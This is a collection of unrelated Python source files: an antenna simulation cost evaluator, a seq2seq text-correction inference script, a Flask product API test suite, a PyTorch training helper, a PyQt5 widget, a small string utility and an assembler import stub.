                                                                            spara_goal_val, spara_eva_freq_range_vec,
                                                                            spara_mae_weight, self.norm_factor)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_objval_mae)
                if spara_maxnorm_weight != 0:
                    spara_objval_max = self.func_spara_objval_calc_maxnormtrunc(singlerun_export_folder,
                                                                                spara_file_name, spara_goal_val,
                                                                                spara_eva_freq_range_vec,
                                                                                spara_maxnorm_weight, self.norm_factor)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_objval_max)
            if self.spara_eval_lin is True:
                # Goal and weight for spara in linear values
                spara_lin_goal_val = self.spara_lin_goal_lst[i]
                spara_lin_mae_weight = self.spara_lin_mae_weight_lst[i]
                spara_lin_max_weight = self.spara_lin_max_weight_lst[i]
                if spara_lin_mae_weight != 0:
                    spara_lin_objval_mae = self.func_spara_lin_objval_calc_maetrunc(singlerun_export_folder,
                                                                                    spara_file_name, spara_lin_goal_val,
                                                                                    spara_eva_freq_range_vec,
                                                                                    spara_lin_mae_weight)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_mae)
                if spara_lin_max_weight != 0:
                    spara_lin_objval_max = self.func_spara_lin_objval_calc_maxtrunc(singlerun_export_folder,
                                                                                    spara_file_name, spara_lin_goal_val,
                                                                                    spara_eva_freq_range_vec,
                                                                                    spara_lin_max_weight)
                    # Form s-para objective value list
                    spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_max)
        return spara_objval_vec

    def func_cst_data_farfield_analyse(self, singlerun_export_folder, ff_export_sub_folder):
        """Evaluate all enabled farfield goals (rotational symmetry, cx-pol
        level, taper angle, SLL, AR) across every exported frequency file and
        return a vector with one mean objective value per enabled goal."""
        # Get farfield data file list if it exists
        ff_export_folder = os.path.join(singlerun_export_folder, ff_export_sub_folder)
        if ff_export_sub_folder != "":
            # Get all the farfield export data file
            farfield_data_file_list = pycst_ctrl.func_file_list_get(ff_export_folder, ext='.txt')
        else:
            # Empty string: the for-loop below simply runs zero iterations.
            farfield_data_file_list = ""
        # Initialize result vectors over all frequency samples
        rotsym_objval_vec = np.array([])
        cxlevel_objval_vec = np.array([])
        taperang_objval_vec = np.array([])
        sll_objval_vec = np.array([])
        ar_ff_mae_objval_vec = np.array([])
        ar_ff_max_objval_vec = np.array([])
        for export_file in farfield_data_file_list:
            theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
                dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
                peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
                ar_arr, ar_boresight_cvec = \
                self.func_exp_ff_data_proc(ff_export_folder, export_file, self.np_theta, self.np_phi, self.pol_ind)
            # Calculate rotational symmetry fitness
            if self.rotsym_weight != 0:
                rotsym_objval_freq = self.func_rotsym_objval_calc_mse(theta_vec, dir_co_norm_arr, self.taper,
                                                                      self.rotsym_goal_val, self.rotsym_weight)
                rotsym_objval_vec = np.append(rotsym_objval_vec, rotsym_objval_freq)
            # Calculate Cx-Pol level fitness
            if self.cxlevel_weight != 0:
                cxlevel_objval_freq = self.func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, self.cxlevel_goal_val,
                                                                          self.cxlevel_weight, self.norm_factor)
                cxlevel_objval_vec = np.append(cxlevel_objval_vec, cxlevel_objval_freq)
            # Calculate taper angle fitness
            if self.taperang_weight != 0:
                taperang_objval_freq = self.func_taperang_objval_calc_rangetrunc(theta_vec, dir_co_norm_arr,
                                                                                 self.taper,
                                                                                 self.taperang_goal_range,
                                                                                 self.taperang_weight, self.norm_factor)
                taperang_objval_vec = np.append(taperang_objval_vec, taperang_objval_freq)
            # Calculate SLL fitness
            if self.sll_weight != 0:
                sll_objval_freq = self.func_sll_objval_calc_trunc(dir_co_norm_arr, self.sll_goal_val,
                                                                  self.sll_weight, self.norm_factor)
                sll_objval_vec = np.append(sll_objval_vec, sll_objval_freq)
            # Calculate Farfield AR fitness
            # Decide theta range for evaluation
            taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, self.taper)
            angle_range = np.array([-taper_ang, taper_ang])
            # Calculate fitness over the theta range
            if self.ar_ff_mae_weight != 0:
                af_ff_mae_objval_freq = self.func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range,
                                                                             self.ar_ff_goal, self.ar_ff_mae_weight,
                                                                             self.norm_factor)
                ar_ff_mae_objval_vec = np.append(ar_ff_mae_objval_vec, af_ff_mae_objval_freq)
            if self.ar_ff_max_weight != 0:
                af_ff_max_objval_freq = self.func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range,
                                                                             self.ar_ff_goal, self.ar_ff_max_weight,
                                                                             self.norm_factor)
                ar_ff_max_objval_vec = np.append(ar_ff_max_objval_vec, af_ff_max_objval_freq)
        # Form radiation pattern objective value list
        # (each enabled goal contributes the mean over all frequency files)
        radpat_objval_vec = np.array([])
        if self.rotsym_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, rotsym_objval_vec.mean())
        if self.cxlevel_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, cxlevel_objval_vec.mean())
        if self.taperang_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, taperang_objval_vec.mean())
        if self.sll_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, sll_objval_vec.mean())
        if self.ar_ff_mae_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_mae_objval_vec.mean())
        if self.ar_ff_max_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_max_objval_vec.mean())
        return radpat_objval_vec

    def func_cst_data_analyse(self, singlerun_export_folder, run_id, ff_export_sub_folder):
        """Top-level cost evaluation for one simulation run: combines
        S-parameter, farfield and near-field AR objectives.

        Returns (total objective value, vector of individual objective values).
        """
        # Evaluate S parameters
        spara_objval_vec = self.func_cst_data_spara_analyse(singlerun_export_folder)
        # Evaluate farfield
        radpat_objval_vec = self.func_cst_data_farfield_analyse(singlerun_export_folder, ff_export_sub_folder)
        # Evaluate near-field AR
        nf_ar_objval_vec = np.array([])
        nf_ar_file_name = self.nf_ar_file_name
        nf_ar_goal_val = self.nf_ar_goal
        nf_ar_mae_weight = self.nf_ar_mae_weight
        nf_ar_maxnorm_weight = self.nf_ar_maxnorm_weight
        nf_ar_eva_freq_range_vec = self.nf_ar_eva_freq_range_vec
        if nf_ar_mae_weight != 0:
            nf_ar_objval_mae = self.func_nf_ar_objval_calc_maetrunc(singlerun_export_folder, nf_ar_file_name,
                                                                    nf_ar_goal_val, nf_ar_eva_freq_range_vec,
                                                                    nf_ar_mae_weight)
            # Form NF AR objective value list
            nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_mae)
        if nf_ar_maxnorm_weight != 0:
            nf_ar_objval_max = self.func_nf_ar_objval_calc_maxnormtrunc(singlerun_export_folder, nf_ar_file_name,
                                                                        nf_ar_goal_val, nf_ar_eva_freq_range_vec,
                                                                        nf_ar_maxnorm_weight)
            # Form near-field AR objective value list
            nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_max)
        # Combine all objective values
        objval_vec = np.concatenate((spara_objval_vec, radpat_objval_vec, nf_ar_objval_vec))
        objval_total = objval_vec.sum()
        # print objective values
        objval_vec_str = np.array2string(objval_vec, precision=7, separator=',', suppress_small=True)
        pring_msg = "Sim[%d]: ObjValVec = %s; ObjVal = %f;" % (run_id, objval_vec_str, objval_total)
        print(pring_msg)
        return objval_total, objval_vec
|
nilq/baby-python
|
python
|
# -*- coding:utf-8 -*-
"""
@description:
"""
import os
import sys
import numpy as np
import torch
from jiwer import wer
import sacrebleu
sys.path.append('..')
import config
from data_reader import load_word_dict
from seq2seq_model import Seq2SeqModel
from utils.logger import logger
# Run on GPU when available, otherwise fall back to CPU.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Inference(object):
    """Wraps a trained seq2seq text-correction model for prediction.

    Only the "bert" architecture is supported; the encoder and decoder are
    loaded from ``<model_dir>/encoder`` and ``<model_dir>/decoder``.
    """

    def __init__(self, arch, model_dir, embed_size=50, hidden_size=50, dropout=0.5, max_length=128,
                 batch_size=8, epochs=10, evaluate_during_training=True, eval_batch_size=64, evaluate_during_training_steps=2500):
        """Load the model.

        Args:
            arch: architecture name; only "bert" is supported.
            model_dir: directory containing "encoder" and "decoder" sub-models.
            embed_size, hidden_size, dropout: kept for interface compatibility;
                not used by the bert architecture.
            Remaining arguments mirror the training-time settings and are
            forwarded through ``model_args``.

        Raises:
            ValueError: if *arch* is not a supported architecture.
        """
        logger.debug("device: {}".format(device))
        if arch == "bert":
            # Bert Seq2seq model
            logger.debug('use bert seq2seq model.')
            # is_available() already returns a bool; no ternary needed.
            use_cuda = torch.cuda.is_available()
            model_args = {
                "reprocess_input_data": True,
                "overwrite_output_dir": True,
                "max_seq_length": max_length if max_length else 128,
                "train_batch_size": batch_size if batch_size else 8,
                "num_train_epochs": epochs if epochs else 10,
                "save_eval_checkpoints": False,
                "save_model_every_epoch": False,
                "silent": False,
                "evaluate_generated_text": True,
                "evaluate_during_training": evaluate_during_training,
                "evaluate_during_training_verbose": evaluate_during_training,
                "eval_batch_size": eval_batch_size if eval_batch_size else 64,
                "evaluate_during_training_steps": evaluate_during_training_steps if evaluate_during_training_steps else 2500,
                "use_multiprocessing": False,
                "save_best_model": True,
                "max_length": max_length if max_length else 128,  # The maximum length of the sequence
                "output_dir": model_dir if model_dir else "output/bertseq2seq_demo/",
            }
            # encoder_type=None, encoder_name=None, decoder_name=None
            self.model = Seq2SeqModel(arch, "{}/encoder".format(model_dir),
                                      "{}/decoder".format(model_dir), args=model_args, use_cuda=use_cuda)
        else:
            logger.error('error arch: {}'.format(arch))
            raise ValueError("Model arch choose error. Must use one of seq2seq model.")
        self.arch = arch
        self.max_length = max_length

    def predict(self, sentence_list):
        """Correct a list of sentences; returns outputs with spaces removed."""
        result = []
        if self.arch == "bert":
            corrected_sents = self.model.predict(sentence_list)
            # Model output is space-tokenized; join back into plain strings.
            result = [i.replace(' ', '') for i in corrected_sents]
        else:
            raise ValueError('error arch.')
        return result
if __name__ == "__main__":
    # Build the corrector from the project-wide configuration module.
    inferencer = Inference(config.arch,
                           config.model_dir,
                           embed_size=config.embed_size,
                           hidden_size=config.hidden_size,
                           dropout=config.dropout,
                           max_length=config.max_length,
                           batch_size=config.batch_size,
                           epochs=config.epochs,
                           evaluate_during_training=config.evaluate_during_training,
                           eval_batch_size=config.eval_batch_size,
                           evaluate_during_training_steps=config.evaluate_during_training_steps
                           )
    print('开始预测,以Tab键中止')
    while True:
        text = input('输入文本:')
        # A lone TAB character ends the interactive loop.
        if text == '\t':
            break
        corrected = inferencer.predict([text])
        print('纠错结果为:' + corrected[0])
|
nilq/baby-python
|
python
|
# Copyright 2016, 2017 John J. Rofrano. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Products API Service Test Suite
Test cases can be run with the following:
nosetests -v --with-spec --spec-color
coverage report -m
codecov --token=$CODECOV_TOKEN
"""
import unittest
import os
import logging
import mock
from flask_api import status # HTTP Status Codes
import app.service as service
import app.vcap_services as vcap
#from mock import MagicMock, patch
from app.models import Products, DataValidationError, db
from .product_factory import ProductFactory
# Test database location; override with the DATABASE_URI environment variable.
DATABASE_URI = os.getenv('DATABASE_URI', 'sqlite:///../db/test.db')
######################################################################
# T E S T C A S E S
######################################################################
class TestProductsServer(unittest.TestCase):
    """ Product Server Tests """

    @classmethod
    def setUpClass(cls):
        """ Run once before all tests """
        service.app.debug = False
        service.initialize_logging(logging.INFO)
        # Set up the test database
        service.app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI

    @classmethod
    def tearDownClass(cls):
        pass

    def setUp(self):
        """ Runs before each test """
        service.init_db()
        db.drop_all()    # clean up the last tests
        db.create_all()  # create new tables
        self.app = service.app.test_client()

    def tearDown(self):
        db.session.remove()
        db.drop_all()

    def _create_products(self, count):
        """ Factory method to create products in bulk """
        products = []
        for _ in range(count):
            test_product = ProductFactory()
            resp = self.app.post('/products',
                                 json=test_product.serialize(),
                                 content_type='application/json')
            self.assertEqual(resp.status_code, status.HTTP_201_CREATED, 'Could not create test product')
            new_product = resp.get_json()
            test_product.id = new_product['id']
            products.append(test_product)
        return products

    def test_index(self):
        """ Test the Home Page """
        resp = self.app.get('/')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        # data = resp.get_json()
        # self.assertEqual(data['name'], 'Product Demo REST API Service')

    def test_get_product_list(self):
        """ Get a list of Products """
        self._create_products(5)
        resp = self.app.get('/products')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), 5)

    def test_get_product(self):
        """ Get a single Product """
        # get the id of a product
        test_product = self._create_products(1)[0]
        resp = self.app.get('/products/{}'.format(test_product.id),
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(data['name'], test_product.name)

    def test_get_product_not_found(self):
        """ Get a Product thats not found """
        resp = self.app.get('/products/0')
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_create_product(self):
        """ Create a new Product """
        test_product = ProductFactory()
        resp = self.app.post('/products',
                             json=test_product.serialize(),
                             content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # Make sure location header is set
        location = resp.headers.get('Location', None)
        # Fixed: use assertIsNotNone instead of `location != None`
        # (PEP 8: comparisons to None use `is`/`is not`).
        self.assertIsNotNone(location)
        # Check the data is correct
        new_product = resp.get_json()
        self.assertEqual(new_product['name'], test_product.name, "Names do not match")
        self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
        self.assertEqual(new_product['available'], test_product.available, "Availability does not match")
        # Check that the location header was correct
        resp = self.app.get(location,
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        new_product = resp.get_json()
        self.assertEqual(new_product['name'], test_product.name, "Names do not match")
        self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
        self.assertEqual(new_product['available'], test_product.available, "Availability does not match")

    def test_update_product(self):
        """ Update an existing product """
        # create a product to update
        test_product = ProductFactory()
        resp = self.app.post('/products',
                             json=test_product.serialize(),
                             content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # update the product
        new_product = resp.get_json()
        new_product['category'] = 'unknown'
        resp = self.app.put('/products/{}'.format(new_product['id']),
                            json=new_product,
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product['category'], 'unknown')

    def test_unavailable_products(self):
        """ Update an existing product to unavailable """
        # create a product to update
        test_product = ProductFactory()
        resp = self.app.post('/products',
                             json=test_product.serialize(),
                             content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # update the product: the /unavailable action must force available=False
        # even though the payload says True
        new_product = resp.get_json()
        new_product['available'] = True
        resp = self.app.put('/products/{}/unavailable'.format(new_product['id']),
                            json=new_product,
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product['available'], False)

    def test_update_product_not_found(self):
        """ Update a product that is not found """
        test_product = ProductFactory()
        resp = self.app.put('/products/0',
                            json=test_product.serialize(),
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_delete_product(self):
        """ Delete a Product """
        test_product = self._create_products(1)[0]
        resp = self.app.delete('/products/{}'.format(test_product.id),
                               content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
        self.assertEqual(len(resp.data), 0)
        # make sure they are deleted
        resp = self.app.get('/products/{}'.format(test_product.id),
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_delete_all(self):
        """ Delete DB """
        self._create_products(5)
        resp = self.app.get('/products')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        resp = self.app.delete('/products/reset',
                               content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)

    def test_query_product_list_by_category(self):
        """ Query Products by Category """
        products = self._create_products(10)
        test_category = products[0].category
        category_products = [product for product in products if product.category == test_category]
        resp = self.app.get('/products',
                            query_string='category={}'.format(test_category))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(category_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product['category'], test_category)

    def test_method_not_allowed(self):
        """ Test a sending invalid http method """
        resp = self.app.post('/products/1')
        self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)

    '''
    Commenting out the URI because it works with Travis but
    Will not work on the IBM Environment
    '''
    # def test_database_uri(self):
    #     """Test database URI is available"""
    #     self.assertEqual(vcap.get_database_uri(), 'postgres://postgres:postgres@localhost:5432/postgres')

    @mock.patch('app.service.Products.find_by_name')
    def test_search_bad_data(self, products_find_mock):
        """ Test a search that returns bad data """
        products_find_mock.return_value = None
        resp = self.app.get('/products', query_string='name=widget1')
        self.assertEqual(resp.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)

    @mock.patch('app.service.Products.find_by_name')
    def test_mediatype_not_supported(self, media_mock):
        """ Handles unsupported media requests with 415_UNSUPPORTED_MEDIA_TYPE """
        media_mock.side_effect = DataValidationError()
        resp = self.app.post('/products', query_string='name=widget1', content_type='application/pdf')
        self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)

    @mock.patch('app.service.Products.find_by_name')
    def test_method_not_supported(self, method_mock):
        """ Handles unsupported HTTP methods with 405_METHOD_NOT_SUPPORTED """
        method_mock.side_effect = None
        resp = self.app.put('/products', query_string='name=widget1')
        self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)

    @mock.patch('app.service.Products.find_by_name')
    def test_bad_request(self, bad_request_mock):
        """ Test a Bad Request error from Find By Name """
        bad_request_mock.side_effect = DataValidationError()
        resp = self.app.get('/products', query_string='name=widget1')
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)

    # @patch('app.service.product.find_by_name')
    # def test_bad_request(self, bad_request_mock):
    #     """ Test a Bad Request error from Find By Name """
    #     bad_request_mock.side_effect = DataValidationError()
    #     resp = self.app.get('/products', query_string='name=fido')
    #     self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
    #
    # @patch('app.service.product.find_by_name')
    # def test_mock_search_data(self, product_find_mock):
    #     """ Test showing how to mock data """
    #     product_find_mock.return_value = [MagicMock(serialize=lambda: {'name': 'fido'})]
    #     resp = self.app.get('/products', query_string='name=fido')
    #     self.assertEqual(resp.status_code, status.HTTP_200_OK)
######################################################################
# M A I N
######################################################################
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main()
|
nilq/baby-python
|
python
|
"""Helper neural network training module."""
from collections import OrderedDict
from pathlib import Path
from time import time
import torch
from torch import nn
from torch.utils.tensorboard import SummaryWriter
from ..datasets import IMAGE_SHAPES, get_loader
from ..models import fit_to_dataset, get_model
from ..models.utils import propagate_bounds
from .utils import (AverageMeter, bounds_logits, compute_accuracy,
get_device_order, manual_seed)
# Public API of this training helper module.
__all__ = ['train_classifier', 'one_epoch']
def train_classifier(evaluate_only, dataset, model, pretrained, learning_rate,
                     momentum, weight_decay, epsilon, factor, temperature,
                     epochs, batch_size, jobs, checkpoint, resume, log_dir,
                     seed):
    """Train and/or evaluate a network.

    Args:
        evaluate_only: if True, run one validation pass and return.
        dataset: dataset name understood by ``get_loader``/``IMAGE_SHAPES``.
        model: architecture name understood by ``get_model``.
        pretrained: load pretrained weights when True.
        learning_rate, momentum, weight_decay: SGD hyper-parameters.
        epsilon: perturbation radius for the bound-propagation loss,
            scaled below by the dataset's normalized input range; 0 disables.
        factor, temperature: weight and softening of the bounds loss term.
        epochs, batch_size, jobs: schedule and data-loader settings.
        checkpoint: path for saving the best checkpoint ('' disables).
        resume: path of a checkpoint to resume from ('' disables).
        log_dir: TensorBoard log directory ('' disables logging).
        seed: RNG seed (cuDNN benchmark mode stays enabled).
    """
    manual_seed(seed, benchmark_otherwise=True)
    # Empty strings become Path('') so the is_file()/Path() checks below work.
    resume = Path(resume if resume else '')
    checkpoint = Path(checkpoint if checkpoint else '')
    # Step-decay schedule: divide the base learning rate by 10 every 30 epochs.
    get_lr = lambda epoch: learning_rate * (0.1**(epoch // 30))
    # get available cuda devices ordered by total memory capacity
    devices = get_device_order()
    if devices:
        print(f'=> using {len(devices)} GPU(s)')
        device = torch.device(f'cuda:{devices[0]}')
    else:
        device = torch.device('cpu')

    def to_device(*tensors, non_blocking=True):
        # Move any mix of tensors/modules to the selected device.
        return [t.to(device, non_blocking=non_blocking) for t in tensors]
    # Data loading code
    cuda = len(devices) > 0
    train_loader = get_loader(dataset, True, batch_size, cuda, jobs)
    val_loader = get_loader(dataset, False, batch_size, cuda, jobs)
    # Last transform is assumed to be the normalization step (mean/std).
    norm = train_loader.dataset.transform.transforms[-1]
    # (1 - m) / s + m / s simplifies to 1 / s: the per-channel width of the
    # normalized input range; averaged over channels below.
    input_ranges = [(1 - m) / s + m / s for m, s in zip(norm.mean, norm.std)]
    input_range = sum(input_ranges) / len(input_ranges)
    # create the model
    if pretrained:
        print(f'=> using pre-trained model {model}')
    else:
        print(f'=> creating model {model}')
    net = fit_to_dataset(get_model(model, pretrained), dataset).eval()
    # Capture state-dict keys now, before any DataParallel wrapping, so the
    # saved checkpoint keys stay unprefixed.
    keys = net.state_dict(keep_vars=True).keys()
    # define loss function (criterion) and optimizer
    criterion = nn.CrossEntropyLoss()
    to_device(net, criterion, non_blocking=False)
    optimizer = torch.optim.SGD(
        net.parameters(),
        learning_rate,
        momentum=momentum,
        weight_decay=weight_decay)

    # define a closure wrapping one_epoch()
    def process(loader, optimizer=None):
        return one_epoch(loader, net, criterion, optimizer, to_device,
                         epsilon * input_range, factor, temperature)
    # optionally resume from a checkpoint
    best_acc1 = 0
    start_epoch = 0
    if resume.is_file():
        print("=> loading checkpoint '{}'".format(resume))
        state = torch.load(resume)
        start_epoch = state['epoch']
        best_acc1 = state['best_acc1']
        net.load_state_dict(state['state_dict'])
        optimizer.load_state_dict(state['optimizer'])
        print(f"=> loaded checkpoint '{resume}' (epoch {state['epoch']})")
    elif resume != Path():
        print(f"=> no checkpoint found at '{resume}'")
    # DataParallel will divide and allocate batch_size to all GPUs
    if len(devices) > 1:
        if model.startswith('alexnet') or model.startswith('vgg'):
            net.features = nn.DataParallel(net.features, devices, device)
        else:
            net = nn.DataParallel(net, devices, device)
    # evaluate the model before training
    progress = process(val_loader)
    val_loss = progress['Loss']
    val_acc = progress['Acc@1']
    print(f'Test[{val_loss}: {val_acc}%]')
    if evaluate_only:
        return
    if log_dir:
        writer = SummaryWriter(log_dir)
        example_image = torch.randn(1, *IMAGE_SHAPES[dataset], device=device)
        writer.add_graph(net, (example_image,))
    lr = get_lr(start_epoch)
    for epoch in range(start_epoch, epochs):
        # decay the learning rate by 10 every 30 epochs
        if epoch % 30 == 0:
            lr = get_lr(epoch)
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
        # train for one epoch and evaluate on validation set
        train_progress = process(train_loader, optimizer)
        train_loss = train_progress['Loss']
        train_acc = train_progress['Acc@1']
        val_progress = process(val_loader)
        val_loss = val_progress['Loss']
        val_acc = val_progress['Acc@1']
        print(f'[{epoch + 1}@{lr:.4e}] '
              f'Train[{train_loss}: {train_acc}%] '
              f'Test[{val_loss}: {val_acc}%]')
        if log_dir:
            # NOTE(review): tag misspells "LearningRate"; kept as-is so existing
            # TensorBoard logs stay comparable -- confirm before renaming.
            writer.add_scalar('Train/LearingRate', lr, epoch)
            for meter in train_progress.values():
                writer.add_scalar(f'Train/{meter.name}', meter.avg, epoch)
            for meter in val_progress.values():
                writer.add_scalar(f'Test/{meter.name}', meter.avg, epoch)
        # remember best acc@1 and save checkpoint
        if val_acc.avg >= best_acc1:
            best_acc1 = val_acc.avg
            if checkpoint != Path():
                parameters = net.state_dict().values()
                # Zip possibly DataParallel-prefixed values with the original
                # unprefixed keys captured before wrapping.
                torch.save({
                    'epoch': epoch + 1,
                    'state_dict': OrderedDict(zip(keys, parameters)),
                    'best_acc1': best_acc1,
                    'optimizer': optimizer.state_dict(),
                }, checkpoint)
        # NaN guard: x != x holds only for NaN -- assumes AverageMeter
        # comparison reflects its value; confirm against AverageMeter.
        if train_loss != train_loss:
            print('Training was stopped (reached NaN)!')
            break
    if log_dir:
        writer.close()
def one_epoch(train_loader, net, criterion, optimizer, preporcess, epsilon,
              factor, temperature):
    """Perform one training epoch.

    Runs *net* over *train_loader*. Trains when *optimizer* is given,
    otherwise evaluates with gradients disabled. *preporcess* moves a batch
    onto the target device. When ``epsilon > 0 and factor > 0``, an extra
    bound-propagation loss term (softened by *temperature*) is added.

    Returns:
        dict mapping meter names to their AverageMeter objects
        (batch time, data time, loss, top-1 and top-5 accuracy).
    """
    batch_time = AverageMeter('Time/BatchTotal', ':6.3f')
    data_time = AverageMeter('Time/BatchData', ':6.3f')
    losses = AverageMeter('Loss', ':.4e')
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    # switch to train mode
    is_training = optimizer is not None
    net.train(is_training)

    def compute_loss(inputs, targets, update_metrics):
        # compute output
        output = net(inputs)
        loss = criterion(output, targets)
        # compute bounds loss
        if epsilon > 0 and factor > 0:
            bounds = propagate_bounds(net, inputs, epsilon)
            logits = bounds_logits(output, bounds.offset, targets)
            # Normalize by the largest |logit| per sample, softened by the
            # temperature, before adding the weighted bounds loss.
            max_abs_logits = logits.abs().max(1).values.view(-1, 1)
            logits = logits / (temperature * max_abs_logits)
            loss += factor * criterion(logits, targets)
        # measure accuracy and record loss
        if update_metrics:
            n = inputs.size(0)
            acc1, acc5 = compute_accuracy(  # pylint: disable=E0632
                output, targets, top_k=(1, 5))
            losses.update(float(loss), n)
            top1.update(float(acc1), n)
            top5.update(float(acc5), n)
        # compute gradient
        if is_training:
            optimizer.zero_grad()
            loss.backward()
        return loss
    with torch.set_grad_enabled(is_training):
        end = time()
        for inputs, targets in train_loader:
            # measure data loading time
            data_time.update(time() - end)
            # move data to device
            inputs, targets = preporcess(inputs, targets)
            # first_time ensures metrics are recorded only once per batch,
            # even if the optimizer evaluates the closure multiple times
            # (as re-evaluating optimizers like LBFGS do).
            first_time = True

            def closure():
                nonlocal first_time
                loss = compute_loss(
                    inputs,  # pylint: disable=W0640
                    targets,  # pylint: disable=W0640
                    first_time,
                )
                first_time = False
                return loss
            if is_training:
                optimizer.step(closure)
            else:
                closure()
            # measure elapsed time
            batch_time.update(time() - end)
            end = time()
    return {x.name: x for x in (batch_time, data_time, losses, top1, top5)}
|
nilq/baby-python
|
python
|
from PyQt5 import QtWidgets
from otter.OListView import OListView
class TemplatesTab(QtWidgets.QWidget):
    """
    Tab listing available templates, shown on the MainWindow.
    """

    def __init__(self, parent):
        super().__init__(parent)
        main_layout = QtWidgets.QVBoxLayout()
        main_layout.setContentsMargins(10, 10, 10, 0)

        self.template_list = OListView(self)
        self.template_list.setEmptyMessage("No templates")
        self.template_list.setSelectionMode(
            QtWidgets.QAbstractItemView.SingleSelection)
        main_layout.addWidget(self.template_list)

        button_layout = QtWidgets.QHBoxLayout()
        button_layout.setContentsMargins(0, 0, 0, 0)

        self.new_button = QtWidgets.QPushButton("New", self)
        self.new_button.setContentsMargins(0, 0, 10, 0)
        button_layout.addWidget(self.new_button)
        button_layout.addStretch()

        self.open_button = QtWidgets.QPushButton("Open", self)
        button_layout.addWidget(self.open_button)

        main_layout.addLayout(button_layout)
        self.setLayout(main_layout)

        self.new_button.clicked.connect(self.onNew)
        self.open_button.clicked.connect(self.onOpen)

        self.updateWidgets()

    def updateWidgets(self):
        """
        Update controls: enable 'Open' only when exactly one item is selected.
        """
        if len(self.template_list.selectedIndexes()) == 1:
            # Bug fix: QWidget.setEnabled() requires a bool argument; the
            # original no-argument call raised TypeError at runtime.
            self.open_button.setEnabled(True)
        else:
            self.open_button.setEnabled(False)
        # NOTE(review): this method is only invoked from __init__; consider
        # connecting it to the list's selection-changed signal -- confirm intent.

    def onNew(self):
        """
        Called when clicked on 'New' button
        """

    def onOpen(self):
        """
        Called when clicked on 'Open' button
        """
|
nilq/baby-python
|
python
|
import string
def alphabetSubsequence(s):
    """Return True if the letters of *s* appear in strictly increasing
    alphabetical order (any character outside a-z fails the check)."""
    # Seed with -1 so a character not found in ascii_lowercase (find() == -1)
    # can never satisfy the strictly-increasing requirement.
    positions = [-1] + [string.ascii_lowercase.find(ch) for ch in s]
    return all(prev < cur for prev, cur in zip(positions, positions[1:]))
# Demo: "effg" is not strictly increasing ('f' repeats), so this prints False.
s = "effg"
print(alphabetSubsequence(s))
|
nilq/baby-python
|
python
|
import os
import sys
import inspect
import string
import numpy as np
PycQED_py3_dir = "D:\\Github\\PycQED_py3"
AssemblerDir = PycQED_py3_dir + \
"\\instrument_drivers\\physical_instruments\\_controlbox"
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.append(AssemblerDir)
import Assembler
import old_assembler
# Expected extension for assembly input files.
